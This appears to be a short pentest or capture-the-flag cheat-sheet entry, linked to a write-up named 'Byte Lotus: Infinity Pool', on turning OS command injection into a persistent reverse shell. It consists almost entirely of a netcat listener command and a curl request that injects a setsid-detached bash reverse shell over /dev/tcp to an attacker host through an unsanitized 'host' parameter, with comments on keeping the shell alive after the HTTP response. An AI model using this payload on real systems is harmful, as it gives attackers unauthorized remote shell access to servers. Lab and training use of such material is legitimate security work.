Command Injection → Detached Reverse Shell
OS command injection via an unsanitized parameter; setsid + input redirect detaches the reverse shell so it survives the HTTP response returning.
# listener on your box
nc -lvnp 4444
# inject after ';' — setsid + < /dev/null & detaches the shell from the request,
# so it keeps running once the HTTP handler returns
curl -s -X POST http://<target-ip>/internal/netcheck \
--data-urlencode "host=<attacker-ip>;setsid bash -c 'bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1' < /dev/null &"
used in: Byte Lotus: Infinity Pool — Two Shells, One Voicemail